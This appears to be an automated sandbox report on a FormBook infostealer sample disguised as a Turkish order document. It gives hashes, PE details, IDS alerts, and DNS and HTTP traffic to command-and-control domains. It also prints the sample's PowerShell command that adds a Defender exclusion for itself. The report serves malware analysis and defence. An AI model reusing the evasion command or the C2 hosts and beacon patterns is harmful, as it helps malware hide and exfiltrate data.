SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqtkt5qd.heg.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.973060700650944
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Ticari Siparis Belgesi 26 07 2024 17545000600.exe
File size:	572'928 bytes
MD5:	4a699c45efa52f13210361413ebd9358
SHA1:	4243cc3717a371b2fdf4a7eb0387ea3b19a62764
SHA256:	078b3704bde85e8ad84e4c21ca910f5d5367843bbecc2a384acc3fd89cd3553c
SHA512:	376fa8883301ecf050277c9e4eeeb902f1cab14902bbedd0366918e5c4f010b1e83a00c641f00cb27d2fbd0e61c9dc278b59b553264682cc572dd36a3a246ed9
SSDEEP:	12288:CLHaT8l/bECvA5LWZv31r3KXDtlv0eKpXcyoEFvR9FOv4Qx11:2aTC/bECvA5LWZv31r3gDtlcexENR9Fo
TLSH:	74C423592E11CB78E66D3B7060E1C56103FA61A76ABBDF9C2CD420FC6E937014249F6B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............~.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x48d37e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A38513 [Fri Jul 26 11:14:27 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8d329	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x90000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8b9b4	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8b384	0x8b400	51c763ef7453d4faf0b14c36b7901c74	False	0.9733242397890485	data	7.978982023106639	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8e000	0x5ac	0x600	32207b233eed35f842d52c9b59e1b50f	False	0.4225260416666667	data	4.088954389995029	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x90000	0xc	0x200	8d0543ad246b806bacabf90763763818	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8e090	0x31c	data			0.43467336683417085
RT_MANIFEST	0x8e3bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-31T16:01:32.709233+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52194	80	192.168.2.5	104.21.80.197
2024-07-31T16:02:34.625397+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52197	80	192.168.2.5	188.114.96.3
2024-07-31T16:02:15.959407+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52196	80	192.168.2.5	38.239.1.118
2024-07-31T15:59:29.688565+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52191	80	192.168.2.5	207.241.198.3
2024-07-31T16:01:53.574872+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52195	80	192.168.2.5	75.101.134.27
2024-07-31T16:01:12.188977+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52193	80	192.168.2.5	213.139.204.22
2024-07-31T16:00:51.151727+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52192	80	192.168.2.5	185.148.106.70
2024-07-31T15:58:50.266265+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	52188	80	192.168.2.5	108.157.194.11

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 15:58:49.756529093 CEST	52188	80	192.168.2.5	108.157.194.11
Jul 31, 2024 15:58:49.762644053 CEST	80	52188	108.157.194.11	192.168.2.5
Jul 31, 2024 15:58:49.762742996 CEST	52188	80	192.168.2.5	108.157.194.11
Jul 31, 2024 15:58:49.762784004 CEST	52188	80	192.168.2.5	108.157.194.11
Jul 31, 2024 15:58:49.769277096 CEST	80	52188	108.157.194.11	192.168.2.5
Jul 31, 2024 15:58:50.260117054 CEST	52188	80	192.168.2.5	108.157.194.11
Jul 31, 2024 15:58:50.266177893 CEST	80	52188	108.157.194.11	192.168.2.5
Jul 31, 2024 15:58:50.266264915 CEST	52188	80	192.168.2.5	108.157.194.11
Jul 31, 2024 15:59:29.186983109 CEST	52191	80	192.168.2.5	207.241.198.3
Jul 31, 2024 15:59:29.192287922 CEST	80	52191	207.241.198.3	192.168.2.5
Jul 31, 2024 15:59:29.192382097 CEST	52191	80	192.168.2.5	207.241.198.3
Jul 31, 2024 15:59:29.192430973 CEST	52191	80	192.168.2.5	207.241.198.3
Jul 31, 2024 15:59:29.197359085 CEST	80	52191	207.241.198.3	192.168.2.5
Jul 31, 2024 15:59:29.682009935 CEST	52191	80	192.168.2.5	207.241.198.3
Jul 31, 2024 15:59:29.688510895 CEST	80	52191	207.241.198.3	192.168.2.5
Jul 31, 2024 15:59:29.688565016 CEST	52191	80	192.168.2.5	207.241.198.3
Jul 31, 2024 16:00:50.668615103 CEST	52192	80	192.168.2.5	185.148.106.70
Jul 31, 2024 16:00:50.675534964 CEST	80	52192	185.148.106.70	192.168.2.5
Jul 31, 2024 16:00:50.675618887 CEST	52192	80	192.168.2.5	185.148.106.70
Jul 31, 2024 16:00:50.675733089 CEST	52192	80	192.168.2.5	185.148.106.70
Jul 31, 2024 16:00:50.681349039 CEST	80	52192	185.148.106.70	192.168.2.5
Jul 31, 2024 16:00:51.148498058 CEST	80	52192	185.148.106.70	192.168.2.5
Jul 31, 2024 16:00:51.148746967 CEST	52192	80	192.168.2.5	185.148.106.70
Jul 31, 2024 16:00:51.149961948 CEST	80	52192	185.148.106.70	192.168.2.5
Jul 31, 2024 16:00:51.151726961 CEST	52192	80	192.168.2.5	185.148.106.70
Jul 31, 2024 16:00:51.153522015 CEST	80	52192	185.148.106.70	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 15:58:36.064492941 CEST	53	56517	162.159.36.2	192.168.2.5
Jul 31, 2024 15:58:36.679088116 CEST	56796	53	192.168.2.5	1.1.1.1
Jul 31, 2024 15:58:36.687817097 CEST	53	56796	1.1.1.1	192.168.2.5
Jul 31, 2024 15:58:49.542361021 CEST	65438	53	192.168.2.5	1.1.1.1
Jul 31, 2024 15:58:49.755422115 CEST	53	65438	1.1.1.1	192.168.2.5
Jul 31, 2024 15:59:08.260679007 CEST	57543	53	192.168.2.5	1.1.1.1
Jul 31, 2024 15:59:08.270699978 CEST	53	57543	1.1.1.1	192.168.2.5
Jul 31, 2024 15:59:28.855667114 CEST	64895	53	192.168.2.5	1.1.1.1
Jul 31, 2024 15:59:29.186208963 CEST	53	64895	1.1.1.1	192.168.2.5
Jul 31, 2024 15:59:49.009880066 CEST	59984	53	192.168.2.5	1.1.1.1
Jul 31, 2024 15:59:49.020596981 CEST	53	59984	1.1.1.1	192.168.2.5
Jul 31, 2024 16:00:30.198699951 CEST	65018	53	192.168.2.5	1.1.1.1
Jul 31, 2024 16:00:30.548365116 CEST	53	65018	1.1.1.1	192.168.2.5
Jul 31, 2024 16:00:50.627090931 CEST	56161	53	192.168.2.5	1.1.1.1
Jul 31, 2024 16:00:50.639444113 CEST	53	56161	1.1.1.1	192.168.2.5
Jul 31, 2024 16:01:11.354378939 CEST	53151	53	192.168.2.5	1.1.1.1
Jul 31, 2024 16:01:11.639980078 CEST	53	53151	1.1.1.1	192.168.2.5
Jul 31, 2024 16:01:32.012541056 CEST	51311	53	192.168.2.5	1.1.1.1
Jul 31, 2024 16:01:32.061033964 CEST	53	51311	1.1.1.1	192.168.2.5
Jul 31, 2024 16:01:52.651820898 CEST	61124	53	192.168.2.5	1.1.1.1
Jul 31, 2024 16:01:52.971532106 CEST	53	61124	1.1.1.1	192.168.2.5
Jul 31, 2024 16:02:14.830511093 CEST	61452	53	192.168.2.5	1.1.1.1
Jul 31, 2024 16:02:15.374789000 CEST	53	61452	1.1.1.1	192.168.2.5
Jul 31, 2024 16:02:34.026571989 CEST	64830	53	192.168.2.5	1.1.1.1
Jul 31, 2024 16:02:34.075836897 CEST	53	64830	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 31, 2024 15:58:36.679088116 CEST	192.168.2.5	1.1.1.1	0xcbf0	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 31, 2024 15:58:49.542361021 CEST	192.168.2.5	1.1.1.1	0x260c	Standard query (0)	www.datalakeflow.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:59:08.260679007 CEST	192.168.2.5	1.1.1.1	0xa398	Standard query (0)	www.xcxocef.shop	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:59:28.855667114 CEST	192.168.2.5	1.1.1.1	0x8b2	Standard query (0)	www.chalkandthimble.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:59:49.009880066 CEST	192.168.2.5	1.1.1.1	0xfbe5	Standard query (0)	www.xiangadvanced.site	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:00:30.198699951 CEST	192.168.2.5	1.1.1.1	0xdbbc	Standard query (0)	www.317wb.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:00:50.627090931 CEST	192.168.2.5	1.1.1.1	0x50b3	Standard query (0)	www.loyalbahis356.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:01:11.354378939 CEST	192.168.2.5	1.1.1.1	0x8d65	Standard query (0)	www.aromacuppa.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:01:32.012541056 CEST	192.168.2.5	1.1.1.1	0x7bcc	Standard query (0)	www.autonwheels.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:01:52.651820898 CEST	192.168.2.5	1.1.1.1	0xc09b	Standard query (0)	www.vanessasmobilespa.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:02:14.830511093 CEST	192.168.2.5	1.1.1.1	0x50d8	Standard query (0)	www.98980901.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:02:34.026571989 CEST	192.168.2.5	1.1.1.1	0xb2bf	Standard query (0)	www.jnhdh8827.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 31, 2024 15:58:36.687817097 CEST	1.1.1.1	192.168.2.5	0xcbf0	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 31, 2024 15:58:49.755422115 CEST	1.1.1.1	192.168.2.5	0x260c	No error (0)	www.datalakeflow.com	d1qrjwiza3wzm5.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 15:58:49.755422115 CEST	1.1.1.1	192.168.2.5	0x260c	No error (0)	d1qrjwiza3wzm5.cloudfront.net		108.157.194.11	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:58:49.755422115 CEST	1.1.1.1	192.168.2.5	0x260c	No error (0)	d1qrjwiza3wzm5.cloudfront.net		108.157.194.128	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:58:49.755422115 CEST	1.1.1.1	192.168.2.5	0x260c	No error (0)	d1qrjwiza3wzm5.cloudfront.net		108.157.194.119	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:58:49.755422115 CEST	1.1.1.1	192.168.2.5	0x260c	No error (0)	d1qrjwiza3wzm5.cloudfront.net		108.157.194.89	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:59:08.270699978 CEST	1.1.1.1	192.168.2.5	0xa398	Name error (3)	www.xcxocef.shop	none	none	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:59:29.186208963 CEST	1.1.1.1	192.168.2.5	0x8b2	No error (0)	www.chalkandthimble.com	chalkandthimble.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 15:59:29.186208963 CEST	1.1.1.1	192.168.2.5	0x8b2	No error (0)	chalkandthimble.com		207.241.198.3	A (IP address)	IN (0x0001)	false
Jul 31, 2024 15:59:49.020596981 CEST	1.1.1.1	192.168.2.5	0xfbe5	Name error (3)	www.xiangadvanced.site	none	none	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:00:50.639444113 CEST	1.1.1.1	192.168.2.5	0x50b3	No error (0)	www.loyalbahis356.com		185.148.106.70	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:00:50.639444113 CEST	1.1.1.1	192.168.2.5	0x50b3	No error (0)	www.loyalbahis356.com		185.148.106.71	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:01:11.639980078 CEST	1.1.1.1	192.168.2.5	0x8d65	No error (0)	www.aromacuppa.com	aromacuppa.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 16:01:11.639980078 CEST	1.1.1.1	192.168.2.5	0x8d65	No error (0)	aromacuppa.com		213.139.204.22	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:01:32.061033964 CEST	1.1.1.1	192.168.2.5	0x7bcc	No error (0)	www.autonwheels.com		104.21.80.197	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:01:32.061033964 CEST	1.1.1.1	192.168.2.5	0x7bcc	No error (0)	www.autonwheels.com		172.67.153.101	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:01:52.971532106 CEST	1.1.1.1	192.168.2.5	0xc09b	No error (0)	www.vanessasmobilespa.com	vanessasmobilespa.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 16:01:52.971532106 CEST	1.1.1.1	192.168.2.5	0xc09b	No error (0)	vanessasmobilespa.com		75.101.134.27	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:02:15.374789000 CEST	1.1.1.1	192.168.2.5	0x50d8	No error (0)	www.98980901.com		38.239.1.118	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:02:34.075836897 CEST	1.1.1.1	192.168.2.5	0xb2bf	No error (0)	www.jnhdh8827.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 31, 2024 16:02:34.075836897 CEST	1.1.1.1	192.168.2.5	0xb2bf	No error (0)	www.jnhdh8827.com		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.datalakeflow.com

www.chalkandthimble.com

www.loyalbahis356.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	52188	108.157.194.11	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 15:58:49.762784004 CEST	168	OUT	GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=XLxih9erqU5OQ/zVa2U9uayzQwvQYqwD+iUwcFTJkQJbXUUHI+Ws7VPKfbblI2vONd0o HTTP/1.1 Host: www.datalakeflow.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	52191	207.241.198.3	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 15:59:29.192430973 CEST	171	OUT	GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=9hrk18skSQhCCsrWhUPNj3yaKA8UlZiY5Un3cfGqWer7qRPGp2VeMQg9udTNeDooaK7+ HTTP/1.1 Host: www.chalkandthimble.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	52192	185.148.106.70	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 16:00:50.675733089 CEST	169	OUT	GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L1MEhp7dpaA HTTP/1.1 Host: www.loyalbahis356.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 31, 2024 16:00:51.148498058 CEST	925	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 31 Jul 2024 14:00:51 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Wed, 31 Jul 2024 15:00:51 GMT Location: https://loyalbahis356.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L1MEhp7dpaA Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2By8jadAxcbJYBTFYLK8jDXIL1B9DTcVQFUVU%2B8LeE065%2BE2ejWnXDOiK5ec6aLtQjD7KOl14Kb8qlLPKeN2Xk%2F9%2BuygdbCoaJ9DIaCgWbLVj96vHc%2F6gqVjLBEjWEB5x4qHpfoZbfQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8abe1df74dbf0c74-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Target ID:	0
Start time:	09:58:05
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Imagebase:	0x6d0000
File size:	572'928 bytes
MD5 hash:	4A699C45EFA52F13210361413EBD9358
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	09:58:10
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Imagebase:	0x7b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	09:58:10
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Imagebase:	0xf0000
File size:	572'928 bytes
MD5 hash:	4A699C45EFA52F13210361413EBD9358
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	09:58:10
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	09:58:10
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Imagebase:	0x7c0000
File size:	572'928 bytes
MD5 hash:	4A699C45EFA52F13210361413EBD9358
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	09:58:10
Start date:	31/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.4556728675.000000001047C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	09:58:13
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmd.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
